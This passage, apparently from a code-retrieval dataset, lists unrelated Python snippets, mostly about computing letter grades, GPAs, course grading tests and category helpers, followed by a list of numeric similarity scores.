marked incorrect\r\n # x + y != x + 2y\r\n input_formula = \"x + y\"\r\n self.assert_grade(problem, input_formula, \"incorrect\")", "def _extract_life_sci_relevance(self, bib):\n life_sci_relevant = 0\n for system_key in ('ipc', 'ecla', 'ipcr', 'cpc'):\n try:\n for classif in bib[system_key]:\n if life_sci_relevant == 0 and self.relevant_regex.match(classif):\n life_sci_relevant = 1\n except KeyError:\n # Skip the warning - classifications are processed again below\n pass\n\n return life_sci_relevant", "def letter_grade(grade):\n\t# define dictionary of grading scale\n\t# Check the fillna above was filled w/ -1.0\n\td = {18.0: 'A', 17.0: 'A', 16.0: 'A', 15.0: 'A', 14.0: 'A', 13.0: 'A',\n\t12.0: 'A', 11.0: 'A', 10.0: 'A', 9.0: 'A', 8.0: 'B', \n\t7.0: 'C', 6.0: 'D', 5.0: 'F', 4.0: 'F', 3.0: 'F', 2.0: 'F', \n\t1.0: 'F', 0.0: 'F', -1.0: '-'}\n\t\n\t# get letter grade only if grade is not a string\n\tif type(grade) != str:\n\t\t# get the letter\n\t\tletter = d[grade]\n\t\treturn letter\n\telse:\n\t\treturn grade", "def grade_to_gpa(grade):\n\n letter_grade = \"\"\n gpa = 0.0\n\n if type(grade) is str:\n accepted_values = [\"A+\", \"A\", \"A-\", \"B+\", \"B\", \"B-\", \"FZ\"]\n\n # check that the grade is one of the accepted values\n if grade in accepted_values:\n\n # assign grade to letter_grade\n letter_grade = grade\n\n #If grade input is a string, but not an accepted value, raise a ValueError\n else:\n raise ValueError(\"Incorrect value. Grade must be an accepted letter grade.\")\n\n elif type(grade) is int:\n\n # check that grade is in the accepted range 0 to 100\n if 0 <= grade <= 100:\n\n # convert the numeric grade to a letter grade\n mark_to_letter = grade\n\n # assign the value to letter_grade\n # hint: letter_grade = mark_to_letter(grade)\n if mark_to_letter >= 90:\n letter_grade = \"A+\"\n elif mark_to_letter >= 85:\n letter_grade = \"A\"\n elif mark_to_letter >= 80:\n letter_grade = \"A-\"\n elif mark_to_letter >= 77:\n letter_grade = \"B+\"\n elif mark_to_letter >= 73:\n letter_grade = \"B\"\n elif mark_to_letter >= 70:\n letter_grade = \"B-\"\n else:\n letter_grade = \"FZ\"\n\n #If grade input is not in accepted range, raise ValueError\n else:\n raise ValueError(\"Incorrect value. 
Grade must be in the accepted range of 0 to 100.\")\n else:\n # raise a TypeError exception\n raise TypeError(\"Invalid type passed as parameter\")\n\n # write a long if-statement to convert letter_grade\n # assign the value to gpa\n if letter_grade == \"A+\":\n gpa = 4.0\n if letter_grade == \"A\":\n gpa = 4.0\n if letter_grade == \"A-\":\n gpa = 3.7\n if letter_grade == \"B+\":\n gpa = 3.3\n if letter_grade == \"B\":\n gpa = 3.0\n if letter_grade == \"B-\":\n gpa = 2.7\n if letter_grade == \"FZ\":\n gpa = 0.0\n\n #Return the gpa of the grade\n return gpa", "def feedback(self):\r\n # Get the green checkmark / red x labels\r\n # We need to filter out the similar-looking CSS classes\r\n # for the rubric items that are NOT marked correct/incorrect\r\n feedback_css = 'div.rubric-label>label'\r\n labels = [\r\n el_class for el_class in\r\n self.q(css=feedback_css).attrs('class')\r\n if el_class != 'rubric-elements-info'\r\n ]\r\n\r\n def map_feedback(css_class):\r\n \"\"\"\r\n Map CSS classes on the labels to correct/incorrect\r\n \"\"\"\r\n if 'choicegroup_incorrect' in css_class:\r\n return 'incorrect'\r\n elif 'choicegroup_correct' in css_class:\r\n return 'correct'\r\n else:\r\n return None\r\n\r\n return map(map_feedback, labels)", "def letter_grades(adict):\n\n for key in adict:\n\t if adict[key] >= 90:\n\t\t adict[key] = 'A'\n\t elif 80 <= adict[key] < 90:\n\t\t adict[key] = 'B'\n\t elif 70 <= adict[key] < 80:\n\t\t adict[key] = 'C'\n\t elif 60 <= adict[key] < 70:\n\t\t adict[key] = 'D'\n\t else:\n\t\t adict[key] = 'F'", "def test_b_grade_above(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.submit_question_answer('p2', {'2_1': 'Correct'})\r\n self.check_grade_percent(0.67)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'B')", "def __init__(self, idy, name):\n self.idy = idy\n self.name = name\n self.active = True\n self.grades = {}", "def test_b_grade_exact(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.check_grade_percent(0.33)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'B')", "def get_cognitive_process_terms(self):\n return # osid.grading.GradeQueryInspector", "def grade(self, request, collection_id=None):\n collection = self.get_object()\n # get learner\n serializer = LearnerSerializer(data=request.data['learner'])\n if not serializer.is_valid():\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n # get or create learner\n learner, created = Learner.objects.get_or_create(**serializer.data)\n\n grade = get_engine().grade(learner, collection)\n return Response({'learner': serializer.data, 'grade': grade})", "def publish_grade(self):\r\n score = self.lcp.get_score()\r\n self.runtime.publish(\r\n self,\r\n 'grade',\r\n {\r\n 'value': score['score'],\r\n 'max_value': score['total'],\r\n }\r\n )\r\n\r\n return {'grade': score['score'], 'max_grade': score['total']}", "async def category(self,ctx):\n await ctx.send(\"Yes this is a category.\")", "def test_weighted_exam(self):\r\n self.weighted_setup()\r\n self.submit_question_answer('FinalQuestion', {'2_1': 'Correct', '2_2': 'Correct'})\r\n self.check_grade_percent(0.75)", "def this_is_the_grade(self, grade_to_set):\n\n\t\tcmds.intField(self.grade_intField, edit = True, value = grade_to_set['grade_value'])\n\t\tself.update_subcategory('intField')\n\t\tif grade_to_set['grade_value'] is not '':\n\t\t\tcmds.scrollField(self.comments_text_field, edit = True, text = 
grade_to_set['comment_text'])\n\t\t\tself.update_subcategory('comments_text')\n\t\tif grade_to_set['default_comments_text'] is not '':\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = grade_to_set['default_comments_text'])\n\t\t\tself.update_subcategory('default_comments_text')\n\t\tif grade_to_set['example_comments_text'] is not '':\n\t\t\tcmds.scrollField(self.example_comments, edit = True, text = grade_to_set['example_comments_text'])\n\t\t\tself.update_subcategory('example_comments_text')\n\n\t\tself.auto_flagged_list = grade_to_set.get('examples', [])\n\t\tself.log('auto_flagged_list updated: \\n{}'.format(self.auto_flagged_list))", "def _explain(self):\n self._explain_simple_consensus()\n logger.LOGGER.info(\"One or more groups have stances on both sides of this bill:\")\n logger.LOGGER.info(self._decision.split_group)", "def test_grading_exception(self):\r\n all_gradesets, all_errors = self._gradesets_and_errors_for(self.course.id, self.students)\r\n student1, student2, student3, student4, student5 = self.students\r\n self.assertEqual(\r\n all_errors,\r\n {\r\n student3: \"I don't like student3\",\r\n student4: \"I don't like student4\"\r\n }\r\n )\r\n\r\n # But we should still have five gradesets\r\n self.assertEqual(len(all_gradesets), 5)\r\n\r\n # Even though two will simply be empty\r\n self.assertFalse(all_gradesets[student3])\r\n self.assertFalse(all_gradesets[student4])\r\n\r\n # The rest will have grade information in them\r\n self.assertTrue(all_gradesets[student1])\r\n self.assertTrue(all_gradesets[student2])\r\n self.assertTrue(all_gradesets[student5])", "def level(score):\n user_level = \"\"\n if score < 20:\n user_level = \"elementary\"\n elif score < 30:\n user_level = \"intermediate\"\n elif score < 35:\n user_level = \"upper intermediate\"\n else:\n user_level = \"advanced\"\n return user_level", "def get_grade(self):\n return self.__grade_value", "def __statistics_disciplines_graded(self):\n disciplines_list = self.__grade_controller.get_list_of_graded_disciplines()\n if len(disciplines_list) == 0:\n print(\"There is no graded discipline!\")\n return\n\n for discipline in disciplines_list:\n print(str(discipline) + \"\\n\")", "def grade_report(course):\n report = []\n for st in course.get_students():\n try:\n average = sum(course.get_grades(st)) / len(course.get_grades(st))\n report.append(str(st) + '\\'s mean grade is: ' + str(average) + '.')\n except ZeroDivisionError:\n report.append(str(st) + ' has no grades.')\n return '\\n'.join(report)", "def weighted_setup(self):\r\n\r\n grading_policy = {\r\n \"GRADER\": [{\r\n \"type\": \"Homework\",\r\n \"min_count\": 1,\r\n \"drop_count\": 0,\r\n \"short_label\": \"HW\",\r\n \"weight\": 0.25\r\n }, {\r\n \"type\": \"Final\",\r\n \"name\": \"Final Section\",\r\n \"short_label\": \"Final\",\r\n \"weight\": 0.75\r\n }]\r\n }\r\n self.add_grading_policy(grading_policy)\r\n\r\n # set up a structure of 1 homework and 1 final\r\n self.homework = self.add_graded_section_to_course('homework')\r\n self.problem = self.add_dropdown_to_section(self.homework.location, 'H1P1')\r\n self.final = self.add_graded_section_to_course('Final Section', 'Final')\r\n self.final_question = self.add_dropdown_to_section(self.final.location, 'FinalQuestion')", "def decide():", "def grade_summary(request, course_key):\r\n course = get_course_with_access(request.user, 'staff', course_key)\r\n\r\n # For now, just a page\r\n context = {'course': course,\r\n 'staff_access': True, }\r\n return 
render_to_response('courseware/grade_summary.html', context)", "def dropping_setup(self):\r\n\r\n grading_policy = {\r\n \"GRADER\": [\r\n {\r\n \"type\": \"Homework\",\r\n \"min_count\": 3,\r\n \"drop_count\": 1,\r\n \"short_label\": \"HW\",\r\n \"weight\": 1\r\n }]\r\n }\r\n self.add_grading_policy(grading_policy)\r\n\r\n # Set up a course structure that just consists of 3 homeworks.\r\n # Since the grading policy drops 1 entire homework, each problem is worth 25%\r\n\r\n # names for the problem in the homeworks\r\n self.hw1_names = ['h1p1', 'h1p2']\r\n self.hw2_names = ['h2p1', 'h2p2']\r\n self.hw3_names = ['h3p1', 'h3p2']\r\n\r\n self.homework1 = self.add_graded_section_to_course('homework1')\r\n self.add_dropdown_to_section(self.homework1.location, self.hw1_names[0], 1)\r\n self.add_dropdown_to_section(self.homework1.location, self.hw1_names[1], 1)\r\n self.homework2 = self.add_graded_section_to_course('homework2')\r\n self.add_dropdown_to_section(self.homework2.location, self.hw2_names[0], 1)\r\n self.add_dropdown_to_section(self.homework2.location, self.hw2_names[1], 1)\r\n self.homework3 = self.add_graded_section_to_course('homework3')\r\n self.add_dropdown_to_section(self.homework3.location, self.hw3_names[0], 1)\r\n self.add_dropdown_to_section(self.homework3.location, self.hw3_names[1], 1)", "def enrichment_factor(y_true, y_score, percentage=..., pos_label=..., kind=...):\n ...", "def get_labels(self):\n return [\"contradiction\", \"entailment\", \"neutral\"]", "def rules(self):\n self.rule1 = min(self.location_is_lessDemand, self.area_is_small, self.unfunishing)\n self.rule2 = min(self.location_is_lessDemand, max(self.area_is_small, self.area_is_average), self.access_is_good)\n self.rule3 = min(self.location_is_veryHighDemand, self.area_is_average, self.fac_is_low, self.access_is_average)\n self.rule4 = min(self.location_is_veryLessDemand, self.area_is_verysmall, self.fully_funishing)\n self.rule5 = min(self.location_is_lessDemand, self.fac_is_average, max(self.area_is_small, self.area_is_average))\n self.rule6 = min(max(self.location_is_lessDemand, self.location_is_averageDemand), self.access_is_good)\n self.rule7 = min(self.location_is_lessDemand, self.access_is_good, self.area_is_large, self.partially_funishing)\n self.rule8 = min(self.location_is_highDemand, self.access_is_good, max(self.bed_is_less, self.bath_is_average))\n self.rule9 = min(self.location_is_veryHighDemand, self.area_is_large, self.unfunishing)\n self.rule10 = min(self.access_is_good, self.area_is_average, (1 - self.unfunishing))\n self.rule11 = min(self.access_is_good, self.area_is_large, self.partially_funishing, self.bed_is_more, self.bath_is_more)", "def test_wrong_answers(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.submit_question_answer('p2', {'2_1': 'Correct'})\r\n self.submit_question_answer('p3', {'2_1': 'Incorrect'})\r\n self.check_grade_percent(0.67)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'B')", "def get_pertinence (cats):\n sorted_cats = sorted(cats, key=cats.__getitem__, reverse=True)\n score_to_test = cats[sorted_cats[0]]\n all_values = [cats[key] for key in sorted_cats]\n average = sum(all_values) / len(all_values)\n logged_rest = [log(abs(average - val) + 1) for val in all_values[1:]]\n \n rest_average = sum(logged_rest) / len(logged_rest)\n logged_main = log(abs(average - all_values[0])+1)\n \n importance = max(logged_main - rest_average, 0)\n \n return importance", "def category_choice(self):\n self.leave_category_choice 
= 1\n while self.leave_category_choice:\n print(fr.FR[15])\n for element in config.CATEGORIES:\n print(str(config.CATEGORIES.index(element)+1)\n + \" : \" + element)\n self.category_choice_input()", "def categorize(cleaned_news):\r\n _ret = ''\r\n relative_categories = ['robbery', 'mugging', 'murder', 'sexual harrasment', 'theft', 'road accident', 'drugs']\r\n classification = nv.newsClassifier.classify(cleaned_news)\r\n for cat in classification:\r\n if cat[1] > 0 and cat[0] in relative_categories:\r\n _ret += cat[0] + ', '\r\n return _ret", "def get_score_bucket(grade, max_grade):\r\n score_bucket = \"incorrect\"\r\n if(grade > 0 and grade < max_grade):\r\n score_bucket = \"partial\"\r\n elif(grade == max_grade):\r\n score_bucket = \"correct\"\r\n\r\n return score_bucket", "def encode(category_main : ):", "def explain(self):", "def valid_category(tags):\n for category in tags:\n if \"task-\" in category:\n if \"bug\" in category:\n return True, \"task-bug-hunting\"\n return True, category\n if category == \"blog\" or category == \"blogs\":\n return True, \"blog\"\n elif category == \"iamutopian\":\n return True, \"iamutopian\"\n elif \"idea\" in category or \"suggestion\" in category:\n return True, \"ideas\"\n elif category == \"development\":\n return True, \"development\"\n elif category == \"graphic\" or category == \"graphics\":\n return True, \"graphics\"\n elif \"bughunt\" in category or \"bug-hunt\" in category:\n return True, \"bug-hunting\"\n elif \"analysis\" in category:\n return True, \"analysis\"\n elif \"visibility\" in category or \"social\" in category:\n return True, \"social\"\n elif \"videotut\" in category or \"video-tut\" in category:\n return True, \"video-tutorials\"\n elif category == \"tutorial\" or category == \"tutorials\":\n return True, \"tutorials\"\n elif \"copywrit\" in category:\n return True, \"copywriting\"\n elif \"document\" in category:\n return True, \"documentation\"\n elif \"translation\" in category:\n return True, \"translations\"\n elif category == \"antiabuse\" or category == \"anti-abuse\":\n return True, \"anti-abuse\"\n return False, \"\"", "def test_bad_probabilities(self):\n categories = {\"asdfa\": 0.05, 2: 0.2, 3: 0.3, 4: 0.4}\n with pytest.raises(ValueError):\n Categorical(\"yolo\", categories, shape=2)", "def alpha_interpretation(self, alpha_score):\r\n if alpha_score <= 0.667:\r\n alpha_interpretation = 'Unreliable agreement'\r\n elif 0.667 < alpha_score < 0.81:\r\n alpha_interpretation = 'Acceptable agreement'\r\n elif 0.80 < alpha_score <= 1:\r\n alpha_interpretation = 'Substantial agreement'\r\n elif alpha_score == 1:\r\n alpha_interpretation = 'Perfect agreement'\r\n return alpha_interpretation", "def testDriver():\n exam1=90\n exam2=85\n assignmentScores = [50, 60, 70, 80, ]\n computeGrades(exam1, exam2, assignmentScores)", "def get_score_summary(fname):\n gradedata = {}\n fhandler = open(fname, 'r')\n rest_data = csv.reader(fhandler)\n for row in rest_data:\n if row[10] not in ['P', '', 'GRADE']:\n gradedata[row[0]] = [row[1], row[10]]\n gradedata.update(gradedata)\n fhandler.close()\n\n gradereview = {}\n for value in gradedata.itervalues():\n if value[0] not in gradereview.iterkeys():\n count1 = 1\n count2 = GRADESCL[value[1]]\n else:\n count1 = gradereview[value[0]][0] + 1\n count2 = gradereview[value[0]][1] + GRADESCL[value[1]]\n gradereview[value[0]] = (count1, count2)\n gradereview.update(gradereview)\n grade = {}\n for key in gradereview.iterkeys():\n count1 = gradereview[key][0]\n count2 = 
gradereview[key][1]/gradereview[key][0]\n grade[key] = (count1, count2)\n return grade", "def categorize(book: TextIO) -> list:\n chunks = get_texts(book)\n texts = []\n for t in chunks:\n level = difficulty(complexity(t))\n texts.append((t, level, keywords(t)))\n return texts", "def category_of(element):\n if element in COLORS:\n return 'colors'\n if element in PETS:\n return 'pets'\n if element in BEVERAGES:\n return 'beverages'\n if element in CIGARETTES:\n return 'cigarettes'\n if element in NATIONALITY:\n return 'nationality'\n return 'numbers'", "def scoring(self):\n pass", "def descString(self):\n return \"\".join ([self.Name, \" (\", str(self.RollCount), \"d\"\\\n , str(self.RollMax), \"; \", str(self.CritRollMin), \"-\"\\\n , str(self.CritRollMax), \"x\", str (self.CritRollMult)\\\n , \") - \", str(self.Value), \" gp\"])", "def __str__(self):\n return \"%s (graded by %s at %s)\" % (self.submission, self.grader, self.date)", "def get_description(self):\n text = \"is a student's t distribution; characterised by its degrees of freedom, which here is\"+str(self.dofs)+\".\"\n return text", "def exercise_5(self):\n student_data = self.student_data\n # Create a dictionary mapping subgroup values to colors\n palette_colors = {\"Rural\": \"green\", \"Urban\": \"blue\"}\n\n # Create a count plot of school with location subgroups\n sns.countplot(x=\"school\", data=student_data\n , hue = \"location\"\n , palette = palette_colors)\n\n\n # Display plot\n plt.show()", "def abilityScores(self):\n mods = [(self.str -10)/2,\n (self.dex-10)/2,\n (self.con-10)/2,\n (self.int-10)/2,\n (self.wis-10)/2,\n (self.cha-10)/2]\n return \"STR: {0} ({1}) \\nDEX: {2} ({3})\\nCON: {4} ({5})\".format(self.str,\n mods[0],\n self.dex,\n mods[1],\n self.con,\n mods[2])+\"\\n\" \\\n \"INT: {0} ({1})\\nWIS: {2} ({3})\\nCHA: {4} ({5})\".format(self.int,\n mods[3],\n self.wis,\n mods[4],\n self.cha,\n mods[5])", "def gradeReport(course):\n report = []\n for student in course.allStudents():\n total = 0.0\n numberOfGrades = 0\n for grade in course.getGrades(student):\n total += grade\n numberOfGrades += 1\n \n try:\n average = total / numberOfGrades\n report.append(str(student) + \"'s mean grade is \" + str(average))\n except ZeroDivisionError:\n report.append(str(student) + \" has no grades\")\n \n return '\\n'.join(report)", "def main():\n\n students = [\"Chris\", \"Jesse\", \"Sally\"]\n grades = [90, 80, 70]\n print_gradebook(students, grades)", "def Subcategories():\n subcat = {\n \t\"Featured\": 0,\n \t\"All\": 1,\n \t\"Collectibles\": 2,\n \t\"Clothing\": 3,\n \t\"BodyParts\": 4,\n \t\"Gear\": 5,\n \t\"Models\": 6,\n \t\"Plugins\": 7,\n \t\"Decals\": 8,\n \t\"Hats\": 9,\n \t\"Faces\": 10,\n \t\"Packages\": 11,\n \t\"Shirts\": 12,\n \t\"Tshirts\": 13,\n \t\"Pants\": 14,\n \t\"Heads\": 15,\n \t\"Audio\": 16,\n \t\"RobloxCreated\": 17,\n \t\"Meshes\": 18,\n \t\"Accessories\": 19,\n \t\"HairAccessories\": 20,\n \t\"FaceAccessories\": 21,\n \t\"NeckAccessories\": 22,\n \t\"ShoulderAccessories\": 23,\n \t\"FrontAccessories\": 24,\n \t\"BackAccessories\": 25,\n \t\"WaistAccessories\": 26,\n \t\"AvatarAnimations\": 27,\n \t\"ClimbAnimations\": 28,\n \t\"FallAnimations\": 30,\n \t\"IdleAnimations\": 31,\n\t \"JumpAnimations\": 32,\n\t \"RunAnimations\": 33,\n \t\"SwimAnimations\": 34,\n \t\"WalkAnimations\": 35,\n \t\"AnimationPackage\": 36,\n \t\"Bundles\": 37,\n \t\"AnimationBundles\": 38,\n\t \"EmoteAnimations\": 39,\n\t \"CommunityCreations\": 40,\n\t \"Video\": 41,\n\t \"Recommended\": 51\n }\n return subcat", "def 
disp_score():", "def update_grade(self, course, grade):\n if course not in self.courses:\n raise NameError('This student is not enrolled in that course')\n else:\n self.courses[course] = grade\n\n return self" ]
[ "0.625208", "0.6094908", "0.60138935", "0.5881098", "0.5708122", "0.5681825", "0.5661043", "0.56477875", "0.5588508", "0.5543916", "0.552775", "0.5490752", "0.5484218", "0.54239833", "0.5411527", "0.5353282", "0.53336465", "0.5323209", "0.5313484", "0.53094536", "0.5239492", "0.5222063", "0.5182566", "0.5167344", "0.5165096", "0.51565784", "0.5140317", "0.51323456", "0.5121351", "0.51167804", "0.5112725", "0.51086366", "0.5101681", "0.50853795", "0.5080263", "0.5077483", "0.50765914", "0.5047738", "0.50311095", "0.50203454", "0.5013274", "0.49741355", "0.49400428", "0.49370128", "0.49189937", "0.49151585", "0.49084783", "0.48998287", "0.4896411", "0.48871538", "0.4880013", "0.4879825", "0.48676193", "0.48478687", "0.4834165", "0.4830536", "0.48151153", "0.4812191", "0.480704", "0.48047203", "0.4802863", "0.47928825", "0.47830695", "0.47828367", "0.47703594", "0.476352", "0.47622848", "0.47580558", "0.47546497", "0.47535938", "0.47471613", "0.47430822", "0.4731235", "0.47294307", "0.47272295", "0.47083077", "0.4707595", "0.47038645", "0.4703344", "0.46985364", "0.46983898", "0.46941957", "0.46928543", "0.4691315", "0.46880937", "0.4686428", "0.46842575", "0.4664765", "0.4663048", "0.4661732", "0.46575686", "0.46575552", "0.46388003", "0.46382564", "0.46381718", "0.46301562", "0.46281445", "0.4625794", "0.46194455", "0.46107963", "0.46078297" ]
0.0
-1
List all aspects of a given grade category in the current timeslot
def list_aspects(request, pk):
    category = get_object_or_404(GradeCategory, pk=pk)
    aspects = GradeCategoryAspect.objects.filter(Category=category)
    ts = get_timeslot()
    return render(request, "results/list_aspects.html", {
        "aspects": aspects,
        'ts': ts,
        'cat': category,
    })
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def time_budget_analysis(cursor, plot_parameters, by_category=False):\n\n categories, out = {}, []\n for subject in plot_parameters[\"selected subjects\"]:\n out_cat, categories[subject] = [], {}\n\n for behavior in plot_parameters[\"selected behaviors\"]:\n\n if plot_parameters[\"include modifiers\"]:\n\n cursor.execute(\"SELECT distinct modifiers FROM events WHERE subject = ? AND code = ?\",\n (subject, behavior))\n distinct_modifiers = list(cursor.fetchall())\n\n if not distinct_modifiers:\n if not plot_parameters[\"exclude behaviors\"]:\n\n if {self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behavior} == {\"State event\"}:\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": 0,\n \"duration_mean\": 0,\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n else: # point\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n continue\n\n if POINT in self.eventType(behavior).upper():\n for modifier in distinct_modifiers:\n\n cursor.execute((\"SELECT occurence, observation FROM events \"\n \"WHERE subject = ? \"\n \"AND code = ? \"\n \"AND modifiers = ? \"\n \"ORDER BY observation, occurence\"),\n (subject, behavior, modifier[0]))\n\n rows = cursor.fetchall()\n\n # inter events duration\n all_event_interdurations = []\n for idx, row in enumerate(rows):\n if idx and row[1] == rows[idx - 1][1]:\n all_event_interdurations.append(float(row[0]) - float(rows[idx - 1][0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": modifier[0],\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": len(rows),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n if STATE in self.eventType(behavior).upper():\n for modifier in distinct_modifiers:\n\n cursor.execute((\"SELECT occurence, observation FROM events \"\n \"WHERE subject = ? \"\n \"AND code = ? \"\n \"AND modifiers = ? 
\"\n \"ORDER BY observation, occurence\"),\n (subject, behavior, modifier[0]))\n\n rows = list(cursor.fetchall())\n if len(rows) % 2:\n out.append({\"subject\": subject, \"behavior\": behavior,\n \"modifiers\": modifier[0], \"duration\": UNPAIRED,\n \"duration_mean\": UNPAIRED, \"duration_stdev\": UNPAIRED,\n \"number\": UNPAIRED, \"inter_duration_mean\": UNPAIRED,\n \"inter_duration_stdev\": UNPAIRED})\n else:\n all_event_durations, all_event_interdurations = [], []\n for idx, row in enumerate(rows):\n # event\n if idx % 2 == 0:\n new_init, new_end = float(row[0]), float(rows[idx + 1][0])\n\n all_event_durations.append(new_end - new_init)\n\n # inter event if same observation\n if idx % 2 and idx != len(rows) - 1 and row[1] == rows[idx + 1][1]:\n if plot_parameters[\"start time\"] <= row[0] <= plot_parameters[\n \"end time\"] and plot_parameters[\"start time\"] <= rows[idx + 1][0] <= \\\n plot_parameters[\"end time\"]:\n all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n # all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": modifier[0],\n \"duration\": round(sum(all_event_durations), 3),\n \"duration_mean\": round(statistics.mean(all_event_durations),\n 3) if len(all_event_durations) else \"NA\",\n \"duration_stdev\": round(statistics.stdev(all_event_durations),\n 3) if len(\n all_event_durations) > 1 else \"NA\",\n \"number\": len(all_event_durations),\n \"inter_duration_mean\": round(\n statistics.mean(all_event_interdurations), 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n else: # no modifiers\n\n if POINT in self.eventType(behavior).upper():\n\n # if len(selectedObservations) > 1:\n cursor.execute(\n \"SELECT occurence,observation FROM events WHERE subject = ? AND code = ? 
ORDER BY observation, occurence\",\n (subject, behavior))\n\n rows = list(cursor.fetchall())\n\n if len(selectedObservations) == 1:\n new_rows = []\n for occurence, observation in rows:\n new_occurence = max(float(plot_parameters[\"start time\"]), occurence)\n new_occurence = min(new_occurence, float(plot_parameters[\"end time\"]))\n new_rows.append([new_occurence, observation])\n rows = list(new_rows)\n\n if not len(rows):\n if not plot_parameters[\"exclude behaviors\"]:\n\n if {self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behavior} == {\"State event\"}:\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"\",\n \"duration\": 0,\n \"duration_mean\": 0,\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n else: # point\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n continue\n\n # inter events duration\n all_event_interdurations = []\n for idx, row in enumerate(rows):\n if idx and row[1] == rows[idx - 1][1]:\n all_event_interdurations.append(float(row[0]) - float(rows[idx - 1][0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": len(rows),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(statistics.stdev(all_event_interdurations),\n 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n if STATE in self.eventType(behavior).upper():\n\n cursor.execute(\n \"SELECT occurence, observation FROM events WHERE subject = ? AND code = ? 
ORDER BY observation, occurence\",\n (subject, behavior))\n\n rows = list(cursor.fetchall())\n if not len(rows):\n if not plot_parameters[\"exclude behaviors\"]: # include behaviors without events\n out.append({\"subject\": subject, \"behavior\": behavior,\n \"modifiers\": \"-\", \"duration\": 0, \"duration_mean\": 0,\n \"duration_stdev\": \"NA\", \"number\": 0, \"inter_duration_mean\": \"-\",\n \"inter_duration_stdev\": \"-\"})\n continue\n\n if len(rows) % 2:\n out.append({\"subject\": subject, \"behavior\": behavior, \"modifiers\": \"NA\",\n \"duration\": UNPAIRED, \"duration_mean\": UNPAIRED, \"duration_stdev\": UNPAIRED,\n \"number\": UNPAIRED, \"inter_duration_mean\": UNPAIRED,\n \"inter_duration_stdev\": UNPAIRED})\n else:\n all_event_durations, all_event_interdurations = [], []\n for idx, row in enumerate(rows):\n # event\n if idx % 2 == 0:\n new_init, new_end = float(row[0]), float(rows[idx + 1][0])\n\n all_event_durations.append(new_end - new_init)\n\n # inter event if same observation\n if idx % 2 and idx != len(rows) - 1 and row[1] == rows[idx + 1][1]:\n if plot_parameters[\"start time\"] <= row[0] <= plot_parameters[\"end time\"] and \\\n plot_parameters[\"start time\"] <= rows[idx + 1][0] <= plot_parameters[\n \"end time\"]:\n all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": round(sum(all_event_durations), 3),\n \"duration_mean\": round(statistics.mean(all_event_durations), 3) if len(\n all_event_durations) else \"NA\",\n \"duration_stdev\": round(statistics.stdev(all_event_durations),\n 3) if len(all_event_durations) > 1 else \"NA\",\n \"number\": len(all_event_durations),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n out += out_cat\n\n if by_category: # and flagCategories:\n\n for behav in out_cat:\n\n try:\n category = [self.pj[ETHOGRAM][x][\"category\"] for x in self.pj[ETHOGRAM] if\n \"category\" in self.pj[ETHOGRAM][x] and self.pj[ETHOGRAM][x][\"code\"] == behav[\n 'behavior']][0]\n except:\n category = \"\"\n\n if category in categories[subject]:\n if behav[\"duration\"] not in [\"-\", \"NA\"] and categories[subject][category][\n \"duration\"] != \"-\":\n categories[subject][category][\"duration\"] += behav[\"duration\"]\n else:\n categories[subject][category][\"duration\"] 